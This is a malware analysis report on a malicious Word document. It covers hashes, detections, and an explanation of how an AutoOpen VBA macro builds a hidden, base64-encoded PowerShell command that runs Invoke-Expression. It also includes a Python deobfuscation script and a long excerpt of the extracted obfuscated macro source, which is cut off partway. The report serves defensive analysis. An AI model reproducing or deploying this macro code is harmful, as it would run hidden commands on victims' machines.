Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6c4467c3f2c85926…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 102.2 KB
Created: 2018-05-28 17:15:00
Authoring application: Microsoft Office Word
First seen: 2019-09-30
MD5: dfd5948845130247b44bebcdd797de0a
SHA-1: 63933aebec0ba08a82c0e0b515dee453300af7ec
SHA-256: 6c4467c3f2c85926ea822a013c7e1f009c659afa0be522ce142dbb185bb75ffd
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
Note: the evidence extracted from this sample is a user-enabled VBA macro that spawns PowerShell; no document-parser exploit is shown, so the T1203 mapping is not supported by the findings on this page.

The file contains a VBA project whose Autoopen sub calls wmGGStpZ(wFGVMUVJh); wmGGStpZ hands the result to Shell(..., vbHide), so the command runs with a hidden window. wFGVMUVJh concatenates the return values of helper functions (paYLEkCB, HJtartZ, jvZdPzfkF, ...), each of which assembles its part from split string literals interleaved with junk arithmetic that is neutralised by On Error Resume Next. The first literals, 'owers' + 'HeLL -WinDow' + 'sTyle hidd' + 'en -e Jg', with the leading 'P' supplied by Chr(vbKeyP) inside the Shell() call, yield a PowerShell invocation with -WindowStyle hidden and a base64-encoded (-e, i.e. -EncodedCommand) script. Decoding the visible part of the base64 (UTF-16LE) gives & ( $SHElLid[1]+$shelLiD[13]+'x')( (("{133}{0}{55}..., that is, Invoke-Expression ('iex', built from characters of $ShellId = Microsoft.PowerShell) applied to a format-string-obfuscated script. The rest of the encoded command is truncated in the extracted listing on this page, so no second-stage URL can be confirmed here; the downloader role is indicated by the command structure and by the ClamAV detection Doc.Dropper.Agent-6562490-0 listed under Heuristics.
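To show how the string handed to Shell() can be recovered without running the macro, the following Python script is an added example (not part of this report or of the tooling that produced it). It emulates the macro's concatenation over a constructed excerpt of the macros.bas listing from this page: only the procedures whose string literals are fully visible are included, helpers cut off in the listing (HJtartZ and later) are left undefined, and undeclared names evaluate to Empty exactly as VBA does without Option Explicit, so the recovered base64 and the decoded PowerShell are prefixes of the real ones. The regexes and helper names are this example's own.

```python
import base64
import re

# Constructed excerpt of the decoded VBA source (macros.bas) listed in this report.
# Only procedures whose string literals are fully visible on the page are kept; the
# helpers that are truncated in the listing are left undefined on purpose.
VBA_EXCERPT = r'''
Function wFGVMUVJh()
On Error Resume Next
DZjKm = (ABoKA * zNDjZ - DKoHDv * Round(30200)) + (95831 - Rnd(sbBEIn) + 61408 + pWbhPo)
wFGVMUVJh = paYLEkCB + HJtartZ + jvZdPzfkF + ljTtF + MiKGwzj + pFnTWvXjZcR + jPkfldlrPW + wazDL + WzZEdOG + AXTEGuZ + FhFMfaJu + uKqDzQXlun + jkQjhbFmT + LLOFrW
End Function
Sub Autoopen()
On Error Resume Next
wmGGStpZ (wFGVMUVJh)
End Sub
Function wmGGStpZ(AioubG)
On Error Resume Next
vJwJLBHBFD = Shell(rozFfIHMph + Chr(vbKeyP) + GRXpwPH + AioubG, vbHide)
End Function
Function paYLEkCB()
On Error Resume Next
whTDrP = (JoYJml * bJEOq - VAOQf * Round(95697)) + (63939 - Rnd(ckDQF) + 80204 + DzFMJ)
jHWTMkzT = "owers" + "HeLL -WinDow" + "sTyle hidd" + "en -e Jg"
oIzwacJrH = "AgACg" + "AIAAkAFMASABF" + "AGwATABpAGQ" + "AWwAxAF0A" + "KwAkAHM" + "AaABlAGwATABpA" + "EQAWwAxADMAXQ" + "ArACcAeAAnACkAK" + "AAgACgAKAAiAHsA"
zCscqZRjpPB = "MQAzAD" + "MAfQB7ADAA" + "fQB7ADUANQB9AH" + "sANAA5AH0AewA1" + "ADgAfQ" + "B7ADY" + "ANwB9AHsANgAw"
WdRIPhRrjDF = "AH0Ae" + "wAxAD" + "AANAB9AHsA" + "MQAxADQA" + "fQB7ADUAM" + "gB9AHsAMQA"
DJfCMJXQ = "2ADgAfQB7AD" + "gANQB9AHsAMQA" + "5AH0Aew" + "AxADQAfQB7AD" + "YAMwB9AHsAMQA" + "wADcAf" + "QB7AD" + "QANAB9AHsA" + "OQA0AH0AewAx"
paYLEkCB = jHWTMkzT + oIzwacJrH + zCscqZRjpPB + WdRIPhRrjDF + DJfCMJXQ
End Function
'''

PROC_RE = re.compile(r'^(Function|Sub) (\w+)\(([^)]*)\)\n(.*?)^End \1', re.S | re.M)
ASSIGN_RE = re.compile(r'^(\w+) = (.+)$', re.M)
CALL_RE = re.compile(r'^(\w+) \((\w+)\)$', re.M)      # "callee (argument)" call statement
SHELL_RE = re.compile(r'Shell\((.+),\s*\w+\)')       # Shell(<command expression>, <window style>)
TOKEN_RE = re.compile(r'"([^"]*)"|Chr\(vbKey(\w)\)|([A-Za-z_]\w*)|(\S)')


def parse_procedures(src):
    """Map procedure name -> (parameter names, {assigned variable: rhs expression}, body)."""
    procs = {}
    for _kind, name, params, body in PROC_RE.findall(src):
        params = [p.strip() for p in params.split(',') if p.strip()]
        procs[name] = (params, dict(ASSIGN_RE.findall(body)), body)
    return procs


def evaluate(expr, proc, procs, bound, depth=0):
    """Evaluate a '+' chain of string literals and identifiers in the scope of `proc`.
    Undeclared names are Empty ('') as in VBA without Option Explicit; the junk
    arithmetic lines are not string expressions and evaluate to '' as well."""
    if depth > 64:
        return ''
    parts = []
    for m in TOKEN_RE.finditer(expr):
        if m.lastindex == 1:                      # "literal"
            parts.append(m.group(1))
        elif m.lastindex == 2:                    # Chr(vbKeyX): vbKeyA..Z / vbKey0..9 equal the ASCII code of X
            parts.append(m.group(2).upper())
        elif m.lastindex == 3:
            parts.append(resolve(m.group(3), proc, procs, bound, depth))
        elif m.group(4) != '+':                   # anything but concatenation: not a string expression
            return ''
    return ''.join(parts)


def resolve(ident, proc, procs, bound, depth):
    """Identifier -> bound parameter, local variable, another Function's return value, or Empty."""
    if ident in bound:
        return bound[ident]
    assigns = procs[proc][1]
    if ident in assigns and ident != proc:
        return evaluate(assigns[ident], proc, procs, bound, depth + 1)
    if ident in procs:                            # a Function returns whatever was assigned to its own name
        return evaluate(procs[ident][1].get(ident, ''), ident, procs, {}, depth + 1)
    return ''


def recover_shell_command(src, entry='Autoopen'):
    """Follow entry -> callee(argument) -> Shell(expr) and return the string handed to Shell()."""
    procs = parse_procedures(src)
    callee, arg = CALL_RE.search(procs[entry][2]).groups()
    params, _assigns, body = procs[callee]
    bound = {params[0]: evaluate(arg, entry, procs, {})}
    return evaluate(SHELL_RE.search(body).group(1), callee, procs, bound)


def decode_encoded_command(cmd):
    """Decode the -e (EncodedCommand) argument: base64 of UTF-16LE text, tolerating a truncated tail."""
    b64 = re.search(r'\s-e\s+(\S+)', cmd, re.I).group(1)
    b64 = b64[: len(b64) - len(b64) % 4]          # drop an incomplete final quartet
    raw = base64.b64decode(b64)
    return raw[: len(raw) - len(raw) % 2].decode('utf-16-le')


if __name__ == '__main__':
    cmd = recover_shell_command(VBA_EXCERPT)
    print(cmd[:80] + '...')
    print(decode_encoded_command(cmd))
```

On this excerpt the recovered command begins PowersHeLL -WinDowsTyle hidden -e JgAgACgAIAAk..., and the decoded text begins & ( $SHElLid[1]+$shelLiD[13]+'x')( (("{133}{0}{55}.... Because $ShellId is "Microsoft.PowerShell", the parenthesised expression is "iex", and the {n} placeholders are the left-hand side of a -f format-string reassembly whose pieces lie in the part of the listing that is truncated on this page. The same evaluator works on the full macros.bas, where the remaining helper functions would supply the rest of the base64.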

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6562490-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6562490-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (For this sample a VBA project was in fact recovered, see the extracted macros.bas, so this marker adds nothing beyond the OLE_VBA_* findings above.)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace URI found in ordinary Office documents and is not an indicator on its own.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 19779 bytes
SHA-256: dc39ec3d09ab1fd2ab4164f5fff6ee03844e70c7bcf52436997b7d0c54f59263
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "LwizJYbfCpKN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function wFGVMUVJh()
On Error Resume Next
DZjKm = (ABoKA * zNDjZ - DKoHDv * Round(30200)) + (95831 - Rnd(sbBEIn) + 61408 + pWbhPo)
bMjls = (RuUNap * wWkupN - anGrN * Round(38050)) + (60633 - Rnd(MwvnW) + 43097 + qMiFwb)
wFGVMUVJh = paYLEkCB + HJtartZ + jvZdPzfkF + ljTtF + MiKGwzj + pFnTWvXjZcR + jPkfldlrPW + wazDL + WzZEdOG + AXTEGuZ + FhFMfaJu + uKqDzQXlun + jkQjhbFmT + LLOFrW
jqhwBm = (mjsCj * oGrXYT - hWSmS * Round(14742)) + (30872 - Rnd(YQjOjs) + 13281 + KPRtv)
End Function
Sub Autoopen()
On Error Resume Next
RDkqdr = (UGjiYz * YufuW - NQIoAz * Round(65117)) + (81022 - Rnd(IGaHGF) + 29497 + cdYvE)
wmGGStpZ (wFGVMUVJh)
CjHsz = (PkXWIM * uwpiJ - nwaERt * Round(8100)) + (16787 - Rnd(CQzrJG) + 11675 + sHkwS)
End Sub
Function wmGGStpZ(AioubG)
On Error Resume Next
iDwuE = (GnzPB * Lcfpz - jWhHZR * Round(5923)) + (88124 - Rnd(rwWYwU) + 51728 + ATwznm)
Riqsv = (ZCHrOv * bihrKj - qcqEw * Round(69837)) + (71315 - Rnd(WAtvkS) + 81079 + aKwKRt)
vJwJLBHBFD = Shell(rozFfIHMph + Chr(vbKeyP) + GRXpwPH + AioubG, vbHide)
hhZlP = (mHoHX * orlwL - ujGzTK * Round(44663)) + (72234 - Rnd(GjMWzw) + 25109 + XXzVI)
End Function


Attribute VB_Name = "tEoNtBzpOmSX"
Function paYLEkCB()
On Error Resume Next
whTDrP = (JoYJml * bJEOq - VAOQf * Round(95697)) + (63939 - Rnd(ckDQF) + 80204 + DzFMJ)
jHWTMkzT = "owers" + "HeLL -WinDow" + "sTyle hidd" + "en -e Jg"
vpoMh = (cTpto * javSD - tijjE * Round(39815)) + (86992 - Rnd(vzYJzB) + 63771 + aLaDz)
oIzwacJrH = "AgACg" + "AIAAkAFMASABF" + "AGwATABpAGQ" + "AWwAxAF0A" + "KwAkAHM" + "AaABlAGwATABpA" + "EQAWwAxADMAXQ" + "ArACcAeAAnACkAK" + "AAgACgAKAAiAHsA"
FjnqPM = (PGkwh * aZOlU - AWcvf * Round(88904)) + (73940 - Rnd(SAksz) + 48889 + dztNF)
zCscqZRjpPB = "MQAzAD" + "MAfQB7ADAA" + "fQB7ADUANQB9AH" + "sANAA5AH0AewA1" + "ADgAfQ" + "B7ADY" + "ANwB9AHsANgAw"
IjtnNR = (GoLaFj * JclIwc - GOVrwI * Round(10254)) + (95445 - Rnd(VYOnsq) + 67529 + RcDQd)
WdRIPhRrjDF = "AH0Ae" + "wAxAD" + "AANAB9AHsA" + "MQAxADQA" + "fQB7ADUAM" + "gB9AHsAMQA"
KmQcEA = (kQcqC * XvRId - OpCrw * Round(9340)) + (35968 - Rnd(drTZZc) + 50033 + FfjAz)
DJfCMJXQ = "2ADgAfQB7AD" + "gANQB9AHsAMQA" + "5AH0Aew" + "AxADQAfQB7AD" + "YAMwB9AHsAMQA" + "wADcAf" + "QB7AD" + "QANAB9AHsA" + "OQA0AH0AewAx"
paYLEkCB = jHWTMkzT + oIzwacJrH + zCscqZRjpPB + WdRIPhRrjDF + DJfCMJXQ
End Function
Function HJtartZ()
On Error Resume Next
lHmzp = (LLzUa * PzIvT - mGktz * Round(6698)) + (31277 - Rnd(rMqlcc) + 22107 + EuEzO)
GfazHmjH = "ADUAOQB9AH" + "sANQA5AH0AewA" + "xADIANwB9AHsAM" + "QAyADUAfQB7" + "ADEAN" + "QA4AH0AewAxADM" + "AMgB9AHsAMQ" + "A2ADcAfQB7"
iRrzwS = (aDJMI * qbrKi - PhzVNr * Round(96118)) + (92906 - Rnd(uNqUI) + 84815 + TCzFw)
DzrcfjwF = "ADIANAB9AHs" + "AMQAzAH0AewA" + "5ADgAfQB" + "7ADMAMgB9AHsAM" + "QA1AH0AewAyADY" + "AfQB7ADYA"
QIjZT = (VbNkW * zMiwd - AVAjp * Round(36441)) + (83948 - Rnd(WRIpM) + 57141 + CQqooX)
JJwVG = "NQB9AHsANQA" + "0AH0AewA4ADE" + "AfQB7ADEA" + "MgA4AH0" + "AewAxADYANgB9AH" + "sANQB9A" + "HsANA"
blhcUC = (fqWYp * cMkTN - TrDTXY * Round(85301)) + (68467 - Rnd(vsHpkQ) + 89921 + wNwpr)
zXWwTY = "A1AH0Ae" + "wAzADUA" + "fQB7ADgANgB9AHs" + "AMwB9AHsAO" + "AAwAH0A" + "ewAxADQAMQB9AH" + "sAOAA4"
HJtartZ = GfazHmjH + DzrcfjwF + JJwVG + zXWwTY
End Function
Function jvZdPzfkF()
On Error Resume Next
blQWZG = (jXaGEs * SJEcS - jwPjF * Round(77320)) + (64739 - Rnd(lGPscA) + 55233 + HBTdGP)
qIcsCA = "AH0AewA4ADc" + "AfQB7A" + "DQAOAB9AHsAN" + "gB9AHsAMQAwADEA" + "fQB7ADEAN" + "QA0AH0Aew" + "AxADUANQB9AHsAN" + "wA1AH"
hijYX = (pIWWiH * VjRkYr - RKNbru * Round(69285)) + (3421 - Rnd(IpGTd) + 65871 + YQJBw)
lfGJI = "0AewA" + "1ADcAfQB7AD" + "EANAA" + "wAH0AewAxADMAM" + "QB9AHsAMgA" + "wAH0AewA2A" + "DQAfQB7ADEANQA"
tVwtzM = (jiEOUD * UEjdM - ENhXnz * Round(75911)) + (60059 - Rnd(UOqwTR) + 85330 + wuXaUa)
zYE
... (truncated)